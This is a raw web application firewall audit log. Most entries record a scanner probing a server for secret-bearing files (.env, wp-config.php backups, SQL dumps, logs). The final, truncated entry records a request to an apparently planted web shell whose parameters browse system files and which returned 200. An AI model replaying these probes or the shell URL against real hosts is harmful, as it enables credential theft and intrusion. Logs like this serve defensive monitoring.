aFCsOWMOUduHrxpwbslYpwAAAAM 185.177.72.204 56696 127.0.0.1 7080 --0c684d04-B-- GET /web/dump.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0c684d04-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c684d04-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/web/dump.sql"] [unique_id "aFCsOWMOUduHrxpwbslYpwAAAAM"] Stopwatch: 1750117433104767 3459 (- - -) Stopwatch2: 1750117433104767 3459; combined=2049, p1=436, p2=1507, p3=21, p4=26, p5=59, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0c684d04-Z-- --d3e9d06c-A-- [17/Jun/2025:05:13:53.326625 +0530] aFCsOQJ4p5Cdblnjra54RgAAAAI 185.177.72.204 56710 127.0.0.1 7080 --d3e9d06c-B-- GET /web/error.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d3e9d06c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3e9d06c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/web/error.log"] [unique_id "aFCsOQJ4p5Cdblnjra54RgAAAAI"] Stopwatch: 1750117433323513 3154 (- - -) Stopwatch2: 1750117433323513 3154; combined=1869, p1=327, p2=1445, p3=20, p4=25, p5=51, sr=94, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d3e9d06c-Z-- --a1d7c734-A-- [17/Jun/2025:05:13:53.653514 +0530] aFCsOWMOUduHrxpwbslYqAAAAAM 185.177.72.204 56748 127.0.0.1 7080 --a1d7c734-B-- GET /web/logs/error.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a1d7c734-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1d7c734-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/web/logs/error.log"] [unique_id "aFCsOWMOUduHrxpwbslYqAAAAAM"] Stopwatch: 1750117433650521 3044 (- - -) Stopwatch2: 1750117433650521 3044; combined=1887, p1=301, p2=1469, p3=19, p4=26, p5=72, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a1d7c734-Z-- --2db42272-A-- [17/Jun/2025:05:13:54.199524 +0530] aFCsOtyZ4SMykfn97vy33AAAAAs 185.177.72.204 56778 127.0.0.1 7080 --2db42272-B-- GET /web/site.conf HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2db42272-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --2db42272-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/web/site.conf"] [unique_id "aFCsOtyZ4SMykfn97vy33AAAAAs"] Stopwatch: 1750117434196778 2789 (- - -) Stopwatch2: 1750117434196778 2789; combined=1770, p1=298, p2=1368, p3=21, p4=25, p5=57, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2db42272-Z-- --2494657b-A-- [17/Jun/2025:05:13:54.308680 +0530] aFCsOmMOUduHrxpwbslYqQAAAAM 185.177.72.204 56780 127.0.0.1 7080 --2494657b-B-- GET /web/site.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2494657b-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --2494657b-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/web/site.sql"] [unique_id "aFCsOmMOUduHrxpwbslYqQAAAAM"] Stopwatch: 1750117434305553 3170 (- - -) Stopwatch2: 1750117434305553 3170; combined=1989, p1=325, p2=1561, p3=21, p4=27, p5=54, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2494657b-Z-- --41a1c147-A-- [17/Jun/2025:05:13:54.428987 +0530] aFCsOgJ4p5Cdblnjra54SAAAAAI 185.177.72.204 56782 127.0.0.1 7080 --41a1c147-B-- GET /web/wp-config.php HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --41a1c147-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --41a1c147-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/web/wp-config.php"] [unique_id "aFCsOgJ4p5Cdblnjra54SAAAAAI"] Stopwatch: 1750117434425543 3509 (- - -) Stopwatch2: 1750117434425543 3509; combined=2304, p1=331, p2=1830, p3=28, p4=36, p5=78, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --41a1c147-Z-- --df51d039-A-- [17/Jun/2025:05:13:54.538198 +0530] aFCsOpVkCcfT-Z8NQYzFTQAAAAc 185.177.72.204 56798 127.0.0.1 7080 --df51d039-B-- GET /web/wp-config.php.old HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --df51d039-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --df51d039-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/web/wp-config.php.old"] [unique_id "aFCsOpVkCcfT-Z8NQYzFTQAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/web/wp-config.php.old"] [unique_id "aFCsOpVkCcfT-Z8NQYzFTQAAAAc"] Stopwatch: 1750117434534886 3370 (- - -) Stopwatch2: 1750117434534886 3370; combined=2022, p1=382, p2=1484, p3=21, p4=26, p5=109, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --df51d039-Z-- --b13cfa18-A-- [17/Jun/2025:05:13:54.647312 +0530] aFCsOlJfblPUQiSn5r2R9wAAAAA 185.177.72.204 56812 127.0.0.1 7080 --b13cfa18-B-- GET /website/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b13cfa18-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --b13cfa18-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/website/.env"] [unique_id "aFCsOlJfblPUQiSn5r2R9wAAAAA"] Stopwatch: 1750117434644200 3166 (- - -) Stopwatch2: 1750117434644200 3166; combined=1946, p1=407, p2=1442, p3=19, p4=26, p5=52, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b13cfa18-Z-- --16626b44-A-- [17/Jun/2025:05:13:54.756781 +0530] aFCsOgrsPejRtmHkrKLg6AAAAAE 185.177.72.204 56818 127.0.0.1 7080 --16626b44-B-- GET /wordpress/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --16626b44-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --16626b44-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/wordpress/.env"] [unique_id "aFCsOgrsPejRtmHkrKLg6AAAAAE"] Stopwatch: 1750117434753264 3575 (- - -) Stopwatch2: 1750117434753264 3575; combined=2165, p1=488, p2=1561, p3=24, p4=28, p5=64, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --16626b44-Z-- --836c6510-A-- [17/Jun/2025:05:13:54.976806 +0530] aFCsOmMOUduHrxpwbslYqgAAAAM 185.177.72.204 56832 127.0.0.1 7080 --836c6510-B-- GET /wp-config.php HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --836c6510-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --836c6510-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/wp-config.php"] [unique_id "aFCsOmMOUduHrxpwbslYqgAAAAM"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/default/htdocs/wp-config.php' not found or unable to stat Apache-Handler: application/x-httpd-php Stopwatch: 1750117434973683 3167 (- - -) Stopwatch2: 1750117434973683 3167; combined=1946, p1=372, p2=1468, p3=21, p4=27, p5=57, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --836c6510-Z-- --b2bc7d25-A-- [17/Jun/2025:05:13:55.085934 +0530] aFCsO1CTF37l_jAzt4oTTwAAAAU 185.177.72.204 56834 127.0.0.1 7080 --b2bc7d25-B-- GET /wp-config.php.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b2bc7d25-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2bc7d25-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/wp-config.php.bak"] [unique_id "aFCsO1CTF37l_jAzt4oTTwAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/wp-config.php.bak"] [unique_id "aFCsO1CTF37l_jAzt4oTTwAAAAU"] Stopwatch: 1750117435082776 3200 (- - -) Stopwatch2: 1750117435082776 3200; combined=1994, p1=376, p2=1496, p3=18, p4=25, p5=79, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b2bc7d25-Z-- --7ab02e65-A-- [17/Jun/2025:05:13:55.196221 +0530] aFCsOwJ4p5Cdblnjra54SQAAAAI 185.177.72.204 56838 127.0.0.1 7080 --7ab02e65-B-- GET /wp-config.php.old HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --7ab02e65-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ab02e65-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/wp-config.php.old"] [unique_id "aFCsOwJ4p5Cdblnjra54SQAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/wp-config.php.old"] [unique_id "aFCsOwJ4p5Cdblnjra54SQAAAAI"] Stopwatch: 1750117435191904 4371 (- - -) Stopwatch2: 1750117435191904 4371; combined=2795, p1=578, p2=2034, p3=24, p4=37, p5=122, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7ab02e65-Z-- --bff22027-A-- [17/Jun/2025:05:13:55.305323 +0530] aFCsO5VkCcfT-Z8NQYzFTgAAAAc 185.177.72.204 56854 127.0.0.1 7080 --bff22027-B-- GET /wp-config.php.swp HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --bff22027-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --bff22027-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/wp-config.php.swp"] [unique_id "aFCsO5VkCcfT-Z8NQYzFTgAAAAc"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/default/htdocs/wp-config.php.swp' not found or unable to stat Stopwatch: 1750117435302113 3254 (- - -) Stopwatch2: 1750117435302113 3254; combined=1986, p1=400, p2=1479, p3=21, p4=27, p5=59, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bff22027-Z-- --f5323367-A-- [17/Jun/2025:05:13:55.524208 +0530] aFCsO5WbMc1Q3J_M-mhJBAAAAAo 185.177.72.204 56882 127.0.0.1 7080 --f5323367-B-- GET /www/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f5323367-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5323367-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/www/.env"] [unique_id "aFCsO5WbMc1Q3J_M-mhJBAAAAAo"] Stopwatch: 1750117435520778 3475 (- - -) Stopwatch2: 1750117435520778 3475; combined=2111, p1=425, p2=1547, p3=22, p4=28, p5=89, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f5323367-Z-- --11e7c53c-A-- [17/Jun/2025:05:13:55.633948 +0530] aFCsO2MOUduHrxpwbslYqwAAAAM 185.177.72.204 56890 127.0.0.1 7080 --11e7c53c-B-- GET /xampp/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --11e7c53c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --11e7c53c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/xampp/.env"] [unique_id "aFCsO2MOUduHrxpwbslYqwAAAAM"] Stopwatch: 1750117435630040 3975 (- - -) Stopwatch2: 1750117435630040 3975; combined=2419, p1=483, p2=1815, p3=26, p4=32, p5=63, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --11e7c53c-Z-- --b3288244-A-- [17/Jun/2025:05:14:03.628079 +0530] aFCsQ5VkCcfT-Z8NQYzFVQAAAAc 216.73.216.240 39246 127.0.0.1 7081 --b3288244-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fbase-files&viewfile=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fbase-files%2Fdot.profile.md5sums HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --b3288244-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3074 Connection: close Content-Type: text/html; charset=UTF-8 --b3288244-H-- Message: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: 